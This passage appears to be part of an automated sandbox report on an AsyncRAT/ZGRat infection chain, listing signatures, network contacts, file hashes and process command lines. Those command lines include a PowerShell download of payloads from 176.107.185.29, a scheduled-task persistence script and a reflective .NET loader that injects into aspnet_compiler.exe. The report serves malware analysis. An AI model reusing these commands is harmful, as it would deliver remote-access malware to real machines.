| Key created | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PR0FlT&L0SS_2O23.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-BitsTransfer -Source 'http://176.107.185.29:666/Rar.jpg' -Destination 'C:\Users\Public\Rar.exe'; Start-BitsTransfer -Source 'http://176.107.185.29:666/load.rar' -Destination 'C:\Users\Public\load.rar'"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Rar.exe x -p111 load.rar
C:\Users\Public\Rar.exe
Rar.exe x -p111 load.rar
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.js"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/v6.17.1/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function FH([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());};function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$Framework = FH(Get-Content -Path 'C:\Users\Public\Framework.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]($Framework,$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function FH([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());};function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$Framework = FH(Get-Content -Path 'C:\Users\Public\Framework.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]($Framework,$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function FH([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());};function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$Framework = FH(Get-Content -Path 'C:\Users\Public\Framework.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]($Framework,$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function FH([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());};function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$Framework = FH(Get-Content -Path 'C:\Users\Public\Framework.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]($Framework,$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Network
| Country | Destination | Domain | Proto |
| UA | 176.107.185.29:666 | 176.107.185.29 | tcp |
| US | 8.8.8.8:53 | 29.185.107.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| UA | 176.107.185.29:666 | 176.107.185.29 | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nodejs.org | udp |
| US | 104.20.23.46:443 | nodejs.org | tcp |
| US | 8.8.8.8:53 | 46.23.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | win0090.theworkpc.com | udp |
| NL | 91.92.250.202:6606 | win0090.theworkpc.com | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.250.92.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tcqh202i.4nn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4976-12-0x0000023C235A0000-0x0000023C235C2000-memory.dmp
memory/4976-13-0x00007FF8BD5B0000-0x00007FF8BE071000-memory.dmp
memory/4976-15-0x0000023C23690000-0x0000023C236A0000-memory.dmp
memory/4976-14-0x0000023C23690000-0x0000023C236A0000-memory.dmp
memory/4976-16-0x0000023C23690000-0x0000023C236A0000-memory.dmp
memory/4976-17-0x0000023C23610000-0x0000023C23636000-memory.dmp
memory/4976-18-0x0000023C23670000-0x0000023C23684000-memory.dmp
memory/4976-21-0x00007FF8BD5B0000-0x00007FF8BE071000-memory.dmp
C:\Users\Public\basta.js
| MD5 | acc80e9a87c6fa26564d11ba56eb1529 |
| SHA1 | bc7fd2c2afae4511618c540a827cd3263e4df4fb |
| SHA256 | f9f6b12f1afd646a4822f11eb2c84533c4afab06162c84dd184b20eae3f40ebe |
| SHA512 | caa4b016b9062a1b39d5e4981aa6104f1a10f3d0a855b83d2f6d6f49d1aa05f4e63b4f81ee3b7fb1009cb003478834e014d8807fa793820535c3cce03bfb6500 |
C:\Users\Public\node.bat
| MD5 | 15333bb0cc252086e87ad2aea347d684 |
| SHA1 | 303efa040dd58b5d27bd884bab31cabcd7030315 |
| SHA256 | 7db89368b3daa954c91364203c177d469fbc56d09b69acf71116b3f0eeffd657 |
| SHA512 | d7308fbeacbf4a1c807850aa19c888a79feeed023fcfa872751d7bc60ab8afb7d631bbb5d3819da3b5882ed642a30604451d9eed62927b87fb813c27c12a24db |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 61e2e57471d559f5f6813c0a7995c075 |
| SHA1 | 33c621541bc0892ddab1b65345a348c14af566e5 |
| SHA256 | c1acff9ad0b9cbb4f83f7953ec66d2ac7c37a6fa4a1474430fc1b04ad049231d |
| SHA512 | 9fb42b4b261b4114d113b7ea96ef33a0bade598332361499b97e5b92b72895f287f753d62d26ad86573ab9f56f1b052d2d4c61a4ccf287ef7d8e1c9363353a5c |
memory/3448-53-0x00007FF8BD5F0000-0x00007FF8BE0B1000-memory.dmp
memory/3448-54-0x000001DBDCD70000-0x000001DBDCD80000-memory.dmp
memory/3448-55-0x000001DBDCD70000-0x000001DBDCD80000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 04006c0181f363c55382544eb4df8112 |
| SHA1 | 7c9ad1c480db78e041d5a7dadda95856b879e5f8 |
| SHA256 | a7a067683ca18d112ef4374975d42c1d2651fc98d017d4482bf38767f4dcfe4a |
| SHA512 | 5faf1b98dc806ed504453d5a8677be4f749c017fc019d45d90036d590b93d6865cb1dfb56f760852288c7c6f53c4796905b64ae81d9f21bb3ac14929220f9069 |
memory/3448-66-0x000001DBDF170000-0x000001DBDF196000-memory.dmp
memory/3448-68-0x00007FF8BD5F0000-0x00007FF8BE0B1000-memory.dmp
memory/4880-78-0x00007FF8BD5F0000-0x00007FF8BE0B1000-memory.dmp
memory/4880-80-0x0000013C47B20000-0x0000013C47B30000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a2f3c64a51b45fc3243cca8e62cb944c |
| SHA1 | ffe053616931bdf1e08c350dbb5d17bbb72ba90a |
| SHA256 | 5d845124679f05d054c90fcdf1bab8c60fdd6c0affc432eabbc1319df514b7c4 |
| SHA512 | e275e351aaf9a1ef2aaa2954aef472e83b520190913634389879289df23dc543b526d2454376f2725316e3b1bc56c0bb14837b96d390113b7b0654ffcc932663 |
memory/4880-81-0x0000013C47B20000-0x0000013C47B30000-memory.dmp
memory/4880-82-0x0000013C47B20000-0x0000013C47B30000-memory.dmp
memory/4880-84-0x00007FF8BD5F0000-0x00007FF8BE0B1000-memory.dmp
C:\Users\Public\app.js
| MD5 | 08a7e6db996774b6806c395c04116803 |
| SHA1 | d0182c34dacc8ab9c8841c8913a1ae7f4d281595 |
| SHA256 | 9268b265b1de1e39454bc0276b85e56e3e1763526a972bfc60a3bbb533192bdc |
| SHA512 | d3191ac299738e2b01edda769da6462df9f292bfe033cc26aeb317d47e04948d56e52eeef19c1d82c31e8f213c7547504e42f354c4c417b9e17aec7c6154e43b |
C:\Users\Public\run.js
| MD5 | ea7771c6e2cd4c1e9b1f00f233764a8c |
| SHA1 | 69fc45ead32fe3749e6b1e2a6eaf6ade10e0379d |
| SHA256 | f2065f51a038146796411358d464c9e0a4ec2c5ba89d1157c588ac2175cb1122 |
| SHA512 | 32c88a76ce6cbaa15531138209a8b644f297264a0b7e3f79a2a0ae88e93793ba88eb95fc7e8cd52b884afa426a93ada3682425afba93098114622aa22d5b1ba1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 80f9b2bc94107ba51f398827218c1eb0 |
| SHA1 | 65f54ce3135ce3fec63667a21a891a7b634d5086 |
| SHA256 | 395ade4b330a64c7fefb8bb435387a968db894af78804d3cf10ac9131a564321 |
| SHA512 | 8125f4e7bbae0a110efd68927dee24aaa470e7af3022591d2168327ce3a3b53d3c58574ae7ece231e2d9bb3537cebc82d2949d55ea9bebfccef7f2444bf72ece |
memory/4404-98-0x00007FF8BD5F0000-0x00007FF8BE0B1000-memory.dmp
memory/4404-99-0x000001FCC9530000-0x000001FCC9540000-memory.dmp
memory/4404-100-0x000001FCC9530000-0x000001FCC9540000-memory.dmp
C:\Users\Public\msg.txt
| MD5 | 57ece7de9ff20214d5949a1a31114d06 |
| SHA1 | 046a95241bbd0dd825dd8738e5c6ccf5f887ba19 |
| SHA256 | c0f52718e1f62533b1e9fb6b4635f59023abe58ede410de7481cd4be6c20eb0f |
| SHA512 | 32004c2e1c748e1e46aa8da74634fe9510ee9d93a3a3d46bb65c9d8444579429706099e6ea42f8a95f9841652f850ecade0d8c3c9324057822b246793f300f6c |
C:\Users\Public\runpe.txt
| MD5 | 50282162d47588c06b6b94db2a2a87b8 |
| SHA1 | b8ff3d4eb37595578380ed77493fb03cd021c696 |
| SHA256 | 29938194794a3f3594b48198673bc14eda1996414bf6ed2ac18a947f67db6df5 |
| SHA512 | 758815510098bf21ef134584bdff747933f18fa6a535347cf242e5987f790b6ee32794a81d5dff36a349304bb7e9af2c655fa9456722aeb4006a2832e234f4b9 |
C:\Users\Public\Framework.txt
| MD5 | 6a08392ecf95df7fc91917dcfaae8da6 |
| SHA1 | 480f6a5c761e1a069c0d68f5ac2aabf727791393 |
| SHA256 | 0a572ee5508d9310936801a04237d56f118dff4dbaa98f60070988cc4b8ca460 |
| SHA512 | d70c436183a9c6f6d4ce9296dce846f94cd12d7fbb76b24e59d88a77349a95a7a0d6ad8f9f4ffc32a98618b3250e0d35e4cf9ff1e711f4e63ffee425597dfc5e |
C:\Users\Public\Invoke.txt
| MD5 | 5fb833d20ef9f93596f4117a81523536 |
| SHA1 | d6aa1f3a789f3f3108666e0ac807ca5ca7dc5fa5 |
| SHA256 | e77f5b9f691679ef6fa67d3ec953199b1696cf6a0e77741c035f11aadfd9bf73 |
| SHA512 | afaec35da2440502779227d9436570db82e1f5d86c90662eae82564d717407518d4e1181e024566e2d8d6029bd4e738b9ba4a3108753a8d0d0c98934db94ba35 |
C:\Users\Public\load.txt
| MD5 | ec4d1eb36b22d19728e9d1d23ca84d1c |
| SHA1 | 5dbc716c4600097b85b9e51d6aeb77a4363b03ed |
| SHA256 | 0cf67fc72b3c86c7a454f6d86b43ed245a8e491d0e5288d4da8c7ff43a7bcdb0 |
| SHA512 | d67f0ffb682d7a13510ec5d3e643889d43bc7593429f806fd882b2c72c05a530c2462d332d4293015f33397cdec84c53d1eea58a7bebaab5504153729df02700 |
C:\Users\Public\getMethod.txt
| MD5 | db37f91f128a82062af0f39f649ea122 |
| SHA1 | f21110ae7ac7cde74e7aa59b22ed10bace35b06b |
| SHA256 | e53ba77fa1dbcb1cc3beed1344f6ae7b182d6a2e2a09bb32ec0d4474978e4a32 |
| SHA512 | 681c5c69acba8c2b327afd0bcb1062fb5f6ee3231e6b95f4cd97ecd768879250eb81d36b1e1640554a85002a7b2b099acfe7f59f70884f10afd51d372583d3ae |
memory/4404-110-0x000001FCE3A80000-0x000001FCE3AD2000-memory.dmp
C:\Users\Public\Gettype.txt
| MD5 | 9221b7b54ed96de7281d31f8ae35be6a |
| SHA1 | 223fad426aa8c753546501b0643ee1720b57bff0 |
| SHA256 | 8eab5c7c6d1116d28014f0da7b7e78b9857da1e6f951b903f2a714fc6d3c790a |
| SHA512 | be37de186628a2c30698a6d4826ec5f8845e7b69317b2f044e86fae615c263a5fd179fcbc50821c85b49c9e3e71adb10a947060312da281418c8ca231d656d5d |
C:\Users\Public\Execute.txt
| MD5 | 40cd014b7b6251e3a22e6a45a73a64e1 |
| SHA1 | 6ea36ce8d4940505e9a2c8fea5db868cd8b3d440 |
| SHA256 | e3a67d9540e9a204f7dc4aa9d44a0ec652856cfa932a21196bf9df23aa0e4cd1 |
| SHA512 | 776d4496cc76782961d66f235ff257567e12e85b950101247fb29de911a4e44048398932f2881b5610cbad6c90fe1c4e99f346cc7d315d7b9a612c89b19b42ea |
C:\Users\Public\NewPE2.txt
| MD5 | 8a56a0e23dbfe7a50c5ec927b73ec5f2 |
| SHA1 | abebd513e68e63e7ec6ae56327c232b6e444ce0a |
| SHA256 | 3b348b38ac24e5e26423cc6d46936e7a4fdedda9d4aa89fdb2cfde4fad662cc1 |
| SHA512 | 276fc17efa7fef658167a94f22c76ae2abb6768d40702a39f970f196099058139249b8e12f18569f7f42f03f581f2543e49f39ab41553dd38d85511558a77ed2 |
memory/1688-111-0x0000000000400000-0x0000000000416000-memory.dmp
memory/4404-114-0x00007FF8BD5F0000-0x00007FF8BE0B1000-memory.dmp
memory/1688-115-0x00000000752F0000-0x0000000075AA0000-memory.dmp
memory/1688-116-0x0000000004F20000-0x0000000004F30000-memory.dmp
memory/1688-117-0x0000000005920000-0x0000000005EC4000-memory.dmp
memory/1688-118-0x0000000005570000-0x0000000005602000-memory.dmp
memory/1688-119-0x0000000005700000-0x000000000570A000-memory.dmp
memory/1688-122-0x00000000063F0000-0x000000000648C000-memory.dmp
memory/1688-123-0x0000000006490000-0x00000000064F6000-memory.dmp
memory/1688-124-0x00000000752F0000-0x0000000075AA0000-memory.dmp
memory/1688-125-0x0000000004F20000-0x0000000004F30000-memory.dmp
memory/4592-126-0x00007FF8BD980000-0x00007FF8BE441000-memory.dmp
memory/4592-127-0x000001F074280000-0x000001F074290000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d8d06bb8c788adea9e9cafbb7e903642 |
| SHA1 | a9fe90ff774ad374e6f89afb0d9572a0d86f8970 |
| SHA256 | bf01df37653166db91a9a77b28c2fa6e458bfec8584139c21ed281759e5f9252 |
| SHA512 | b3b4171eb921d93b98c613dd372607a94128aebecdac7c80a91bc5748ba130924371bbd930ab1bd7d98a448f2613b088f80366470cc26ef14e802dda46fab46f |
memory/4592-138-0x000001F074280000-0x000001F074290000-memory.dmp
memory/316-140-0x00000000752F0000-0x0000000075AA0000-memory.dmp
memory/4592-143-0x00007FF8BD980000-0x00007FF8BE441000-memory.dmp
memory/316-144-0x0000000005560000-0x0000000005570000-memory.dmp
memory/316-146-0x00000000752F0000-0x0000000075AA0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-22 21:29
Reported
2024-01-22 21:32
Platform
win10v2004-20231215-en
Max time kernel
147s
Max time network
151s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ZGRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2772 set thread context of 480 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
| PID 2772 set thread context of 4960 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings | C:\Windows\System32\WScript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2O22-Tax-Returns.wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-BitsTransfer -Source 'http://176.107.185.29:666/Rar.jpg' -Destination 'C:\Users\Public\Rar.exe'; Start-BitsTransfer -Source 'http://176.107.185.29:666/load.rar' -Destination 'C:\Users\Public\load.rar'"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Rar.exe x -p111 load.rar
C:\Users\Public\Rar.exe
Rar.exe x -p111 load.rar
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.js"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/v6.17.1/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function FH([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());};function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$Framework = FH(Get-Content -Path 'C:\Users\Public\Framework.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]($Framework,$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
